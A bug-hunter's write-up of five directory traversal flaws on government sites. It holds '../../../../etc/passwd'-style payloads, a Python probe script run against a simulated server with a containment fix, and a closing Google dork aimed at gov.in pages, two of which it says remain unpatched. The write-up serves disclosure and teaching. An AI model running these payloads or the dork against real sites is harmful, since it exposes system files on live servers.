LFI Spree
Five directory traversal/LFI vulnerabilities I found using a dork

| Field | Value |
|---|---|
| Vulnerability | LFI (Local File Inclusion) |
| Description | A file inclusion vulnerability allows an attacker to include a file, usually by abusing a "dynamic file inclusion" mechanism implemented in the target application. The vulnerability occurs because user-supplied input is used without proper validation. |
| Impact | LFI can lead to the disclosure of critical information or even remote code execution. |
| OWASP test ID | OTG-INPVAL-013 |
In March, during a security assessment of a government website, I identified five instances of Local File Inclusion (LFI) vulnerabilities using a custom Google dork. The exploitation was straightforward. While probing for injection points, I discovered a parameter named fileName=. By appending directory traversal sequences such as ../, I was able to access internal directories and successfully retrieve the contents of sensitive files.
- `../../../../etc/passwd` : lists the local user accounts on the system (the password hashes themselves live in `/etc/shadow` on modern systems)
- `../../../../etc/issue` : contains a message or system identification printed before the login prompt
- `../../../../etc/hosts` : a local, plain-text file used to manually map IP addresses to hostnames
- `../../../../proc/version` : reports the version of the running Linux kernel

and many more...
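The probing loop above, as an added example that is not code from the original write-up: it generates `../` chains of increasing depth for a `fileName`-style parameter, recognises the files listed above by content fingerprint, and shows the containment check the application should have performed. Everything below is constructed so it runs offline: the filesystem contents, the assumed include directory `/var/www/app/pages`, and the `vulnerable_server`/`hardened_server` callables that stand in for the real `.do` endpoint are all hypothetical.

```python
import posixpath
import re

# Constructed stand-in for the target's filesystem (sample content, not real data).
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n",
    "/etc/hosts": "127.0.0.1 localhost\n10.0.0.5 app-01\n",
    "/etc/issue": "Ubuntu 22.04.3 LTS \\n \\l\n\n",
    "/proc/version": "Linux version 5.15.0-91-generic (buildd@host) (gcc 11.4.0) #1 SMP\n",
    "/var/www/app/pages/welcome.html": "<h1>Welcome</h1>\n",
}
BASE_DIR = "/var/www/app/pages"  # assumed include directory of the hypothetical app

# Content fingerprints for the files pulled in the write-up. /etc/issue has no
# stable format, so its pattern is only a weak heuristic (Debian/Ubuntu escapes).
FINGERPRINTS = {
    "etc/passwd": re.compile(r"^root:[^:]*:0:0:", re.M),
    "etc/hosts": re.compile(r"^127\.0\.0\.1\s+localhost", re.M),
    "proc/version": re.compile(r"^Linux version \d"),
    "etc/issue": re.compile(r"\\[nlr]|GNU/Linux"),
}


def traversal_payloads(target, max_depth=6):
    """Yield ../ chains of increasing depth for an absolute target path.

    The first depth that works tells you how many directories below / the
    application's include base sits.
    """
    target = target.lstrip("/")
    for depth in range(1, max_depth + 1):
        yield "../" * depth + target


def identify(body):
    """Return the fingerprint name matched by a response body, or None."""
    for name, pattern in FINGERPRINTS.items():
        if pattern.search(body):
            return name
    return None


def probe(server, target, max_depth=6):
    """Send each payload to `server` (a callable taking the fileName value) and
    return (payload, identified_file) for the first hit, or None."""
    for payload in traversal_payloads(target, max_depth):
        hit = identify(server(payload))
        if hit:
            return payload, hit
    return None


def vulnerable_server(file_name):
    """The bug pattern from the write-up: join user input to a base directory
    and read whatever the normalised path points at."""
    path = posixpath.normpath(posixpath.join(BASE_DIR, file_name))
    return FAKE_FS.get(path, "404 Not Found")


def safe_resolve(base_dir, user_path):
    """Normalise base/user_path and refuse anything that leaves base_dir.

    posixpath.join discards base_dir when user_path is absolute, and normpath
    collapses ../ chains, so the final prefix check covers both cases. A real
    handler should additionally canonicalise with os.path.realpath so that a
    symlink inside base_dir cannot point back outside it.
    """
    if "\x00" in user_path:
        raise ValueError("null byte in path")
    base = posixpath.normpath(base_dir)
    resolved = posixpath.normpath(posixpath.join(base, user_path))
    if resolved != base and not resolved.startswith(base + "/"):
        raise ValueError("path escapes base directory: %s" % resolved)
    return resolved


def hardened_server(file_name):
    """Same handler with the containment check in front of the file read."""
    try:
        path = safe_resolve(BASE_DIR, file_name)
    except ValueError:
        return "400 Bad Request"
    return FAKE_FS.get(path, "404 Not Found")


if __name__ == "__main__":
    for target in ("/etc/passwd", "/etc/hosts", "/etc/issue", "/proc/version"):
        print(target, "vulnerable:", probe(vulnerable_server, target),
              "hardened:", probe(hardened_server, target))
```

Against the vulnerable handler the first hit comes at depth four, which is exactly the number of directories between `/` and the assumed base directory; against the hardened handler every payload is rejected before the read, while a legitimate relative name such as `welcome.html` still resolves. Treat an `/etc/issue` match as a lead to confirm by eye, since its pattern is heuristic.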
But I failed when I tried to convert this vulnerability into RCE.
I created a Google dork to find the same entry point on other domains and got around 10-15 different websites in the search results. I tried the same files, and five domains were vulnerable to LFI (two websites are still not patched).
Report timeline
1-March-2024 –> Reported five vulnerabilities to the stakeholder
2-March-2024 –> Stakeholder acknowledged the issue
10-March-2024 –> Three vulnerabilities patched
Google Dork: `Previewpage.do?filename= site:gov.in`